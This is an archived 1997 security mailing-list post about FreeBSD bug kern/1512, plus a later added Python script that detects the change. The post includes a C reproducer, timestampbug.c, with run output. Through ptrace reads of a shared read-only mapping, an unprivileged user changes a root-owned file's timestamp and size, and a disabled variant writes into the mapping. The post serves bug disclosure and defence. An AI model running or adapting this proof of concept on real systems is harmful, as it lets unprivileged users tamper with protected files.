
BoS: Re: [root@server.blaze.net.au: server security check output]

daemon@ATHENA.MIT.EDU (Tor Egge)
Fri Feb 14 23:26:43 1997

Cc: freebsd-current@freebsd.org
In-Reply-To: Your message of "14 Feb 1997 10:21:57 -0800"
Date: Fri, 14 Feb 1997 23:57:25 +0100
From: Tor Egge <Tor.Egge@idt.ntnu.no>
Reply-To: best-of-security@suburbia.net
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net


> In article <19970215033810.19932@usn.blaze.net.au>,
> David Nugent  <davidn@labs.usn.blaze.net.au> wrote:
> 
> > This is the second time I've seen this since I last built
> > world - something has "touched" sendmail. It doesn't appear to
> > have been hacked, and I even checked the md5 against what it was
> > originally when I last installed sendmail and it hasn't changed.
> > But suddenly the file date has been modified, and only a couple
> > of hours ago.
> 
> Yes, I have seen this sort of thing in all versions of FreeBSD
> since 2.0.5, the first one I used.  It's not specific to sendmail,
> although I've only noticed it in setuid programs.  (That may be
> just because those are the ones that show up in the security logs.)
> I have seen it happen to my X server a couple of times.  It is some
> kind of anomaly involving the VM system, I would guess.  I don't
> like it either, but nobody has ever been able to explain it, as
> far as I know.  On my system, I see it maybe once every 4-6 months.
> I don't think anybody knows of a way to make it happen deliberately.
> 

Using ptrace, you can touch any file for which you have read access.

A program for recreating this problem is appended.

This time, it also expanded the size of the file from 161 to 4096 bytes.

-----
ikke:/amd/kamelia/home/kamelia/a/tegge$ ls -l /etc/shells*
-rw-r--r--   1 root     wheel         161 Aug 17  1996 /etc/shells
-rw-r--r--   1 root     wheel         161 Aug 16  1996 /etc/shells.bak
-rw-r--r--   1 root     wheel         161 Sep 21 19:21 /etc/shells2
ikke:/amd/kamelia/home/kamelia/a/tegge$ ./timestampbug 
fd = 3
len is 161
PT_ATTACH: got = 0, got = 0x00000000, errno=0, error=Undefined error: 0
waitpid: got = 0, got = 0x00000000, errno=0, error=Undefined error: 0
PT_READ: got = 419545088, got = 0x1901c000, errno=0, error=Undefined error: 0
PT_READ: got = 1766596643, got = 0x694c2023, errno=0, error=Undefined error: 0
ikke:/amd/kamelia/home/kamelia/a/tegge$ sync
ikke:/amd/kamelia/home/kamelia/a/tegge$ ls -l /etc/shells*
-rw-r--r--   1 root     wheel         161 Aug 17  1996 /etc/shells
-rw-r--r--   1 root     wheel         161 Aug 16  1996 /etc/shells.bak
-rw-r--r--   1 root     wheel        4096 Feb 14 23:39 /etc/shells2
---------

- Tor Egge



To: dyson@freebsd.org, dyson@dyson.iquest.net
Subject: Re: More feedback on kern/1512
In-Reply-To: Your message of "Mon, 9 Sep 1996 10:13:35 -0500 (EST)"
References: <199609091513.KAA03606@dyson.iquest.net>
X-Mailer: Mew version 1.03 on Emacs 19.31.1
Date: Fri, 20 Sep 1996 01:00:20 +0200
From: Tor Egge <tegge@idt.unit.no>
Approved: proff@suburbia.net




Problem 1 in kern/1512 seems fixed. Good work.

Here is a short program to reproduce the timestamp problem reported in
kern/1512. By performing 

   as root:

	cp -p /etc/shells /etc/shells2       

   
   as unprivileged user:

	cc -o timestampbug timestampbug.c
	./timestampbug
	sync
	/bin/ls -lT /etc/shells*

   
   /etc/shells2 and /etc/shells no longer have the same timestamp.

   There is at least one bug in /usr/src/sys/miscfs/procfs/procfs_mem.c
   where a vm subsystem error code (KERN_PROTECTION_FAILURE) is passed to
   the user program as a standard error code (ENOENT).

- Tor Egge


Content-Description: "timestampbug.c"

/*
 * timestampbug.c - reproducer for the kern/1512 timestamp problem.
 *
 * The child maps a read-only file MAP_SHARED and sleeps.  The parent
 * attaches with ptrace(2) and reads one word out of the child's mapping
 * with PT_READ_D.  On the affected kernels that read alone dirties the
 * page, so the next sync writes it back and the file's mtime (and, as
 * the ls output in the thread shows, its size) changes.
 */
#include <sys/types.h>
#include <sys/param.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ptrace.h>
#include <sys/signal.h>
#include <sys/wait.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Globals: after fork() the child's copy of `map' sits at the same
 * address as the parent's, which is what lets the parent locate the
 * mapping by reading &map out of the child with PT_READ_D.
 */
char *map;
int fd;
struct stat stbuf;
pid_t pid;

int status;
char x;

/* Print one ptrace(2)/waitpid(2) result in the format the transcript shows. */
static void
report(const char *what, int got)
{
	printf("%s: got = %d, got = 0x%08x, errno=%d, error=%s\n",
	    what, got, (unsigned)got, errno, strerror(errno));
}

int
main(void)
{
	int got;
	size_t len;

	pid = fork();
	assert(pid >= 0);

	if (pid == 0) {
		/*
		 * Child: map the target read-only and shared, then sleep
		 * long enough for the parent to attach and read.
		 */
		assert((fd = open("/etc/shells2", O_RDONLY, 0)) >= 0);
		printf("fd = %d\n", fd);
		assert(!fstat(fd, &stbuf));
		len = stbuf.st_size;
		printf("len is %lu\n", (unsigned long)len);
		map = mmap(0, len, PROT_READ, MAP_SHARED, fd, (off_t)0);
		assert(map != MAP_FAILED && map != NULL);
#if 0
		printf("Child: map= %p\n", (void *)map);
		fflush(stdout);
		x = *map;
		printf("Child: *map = %d\n", x);
		fflush(stdout);
#endif
#if 0
		/* Variant (disabled): try to make the mapping writable. */
		errno = 0;
		got = mprotect(map, 4096, PROT_READ | PROT_WRITE);
		report("mprotect", got);
#endif
		sleep(10);
		exit(0);
	}

	/* Parent: attach to the child and read through its mapping. */
	sleep(1);
	errno = 0;
	got = ptrace(PT_ATTACH, pid, 0, 0);
	report("PT_ATTACH", got);

	errno = 0;
	got = waitpid(pid, &status, WNOHANG | WUNTRACED);
	report("waitpid", got);

	/* Fetch the child's `map' pointer, then one word through it. */
	errno = 0;
	got = ptrace(PT_READ_D, pid, (char *)&map, 0);
	report("PT_READ", got);

	/* A word holds a whole pointer only on the 32-bit hosts in the thread. */
	map = (char *)(intptr_t)got;
#if 1
	errno = 0;
	got = ptrace(PT_READ_D, pid, map, 0);
	report("PT_READ", got);
#endif
#if 0
	/* Variant (disabled): write the word back into the mapping. */
	errno = 0;
	got = ptrace(PT_WRITE_D, pid, map, got);
	report("PT_WRITE", got);
	errno = 0;
	got = ptrace(PT_WRITE_D, pid, map + 1024, got);
	report("PT_WRITE", got);
#endif
	return 0;
}
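The diagnostic question that runs through both messages above (the daily security report flags a changed mtime on a setuid binary; David checked the md5 and found the bytes unchanged; Tor's kern/1512 run later grew /etc/shells2 from 161 to 4096 bytes) can be turned into a baseline comparison on the defender's side. The following Python script is an added example, not code from the thread or from FreeBSD. It records size, mtime and digest of a file and on a later run classifies the change as metadata-only, as page-sized zero padding of otherwise intact content, or as a real content change. Assumptions not stated on the page: a 4096-byte page size, that the bytes appended by the writeback are zero-filled (the thread reports only the new size), sha256 in place of the md5 the thread mentions, and a constructed stand-in file in a temporary directory instead of /etc/shells2.

```python
"""Baseline check for the symptom discussed in the thread.

Added example, not code from the thread or from FreeBSD.  A later run
compares a file against a recorded baseline and reports:

  unchanged    same bytes, same mtime
  metadata     same bytes, mtime moved (the sendmail case: md5 unchanged)
  page-padded  original bytes intact, file grown to a multiple of the page
               size with an all-zero tail (the 161 -> 4096 byte growth of
               /etc/shells2; the zero fill is an assumption)
  content      anything else: treat as a real modification

sha256 is used in place of the md5 the thread mentions.
"""
import hashlib
import os
import tempfile

PAGE_SIZE = 4096  # assumed page size of the hosts in the thread

# Constructed stand-in for the 161-byte /etc/shells2 of the transcript.
ORIGINAL = (b"# constructed /etc/shells stand-in\n" * 8)[:161]


def snapshot(path):
    """Record size, mtime and digest of one file."""
    st = os.stat(path)
    with open(path, "rb") as f:
        digest = hashlib.sha256(f.read()).hexdigest()
    return {"size": st.st_size, "mtime_ns": st.st_mtime_ns, "sha256": digest}


def classify(path, baseline):
    """Compare the current file with a baseline taken by snapshot()."""
    with open(path, "rb") as f:
        data = f.read()
    digest = hashlib.sha256(data).hexdigest()
    mtime_ns = os.stat(path).st_mtime_ns
    if digest == baseline["sha256"]:
        return "unchanged" if mtime_ns == baseline["mtime_ns"] else "metadata"
    # Bytes differ.  Check for the page-padding signature before calling
    # it a content change: original prefix intact, zero tail, page multiple.
    old_len = baseline["size"]
    prefix_intact = (len(data) > old_len and
                     hashlib.sha256(data[:old_len]).hexdigest() == baseline["sha256"])
    tail = data[old_len:]
    tail_is_zero = tail.count(0) == len(tail)
    grown_to_page = len(data) % PAGE_SIZE == 0
    if prefix_intact and tail_is_zero and grown_to_page:
        return "page-padded"
    return "content"


def demo():
    """Run the classifier over four constructed states of one file."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "shells2")
        with open(path, "wb") as f:
            f.write(ORIGINAL)
        base = snapshot(path)

        results["untouched"] = classify(path, base)

        # Same bytes, mtime moved one second forward.
        later = base["mtime_ns"] + 10**9
        os.utime(path, ns=(later, later))
        results["touched"] = classify(path, base)

        # Grown to one page with a zero-filled tail.
        with open(path, "wb") as f:
            f.write(ORIGINAL + b"\0" * (PAGE_SIZE - len(ORIGINAL)))
        results["padded"] = classify(path, base)

        # A real edit: a line appended.
        with open(path, "wb") as f:
            f.write(ORIGINAL + b"/usr/local/bin/bash\n")
        results["edited"] = classify(path, base)
    return results


if __name__ == "__main__":
    for state, verdict in demo().items():
        print(f"{state:10s} -> {verdict}")
```

A "page-padded" verdict is still a change worth acting on (the file on disk is no longer what was installed); the point of the separate label is that it is a recognisable signature of the writeback behaviour discussed here rather than an edit of the content, which tells the investigator where to look next.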



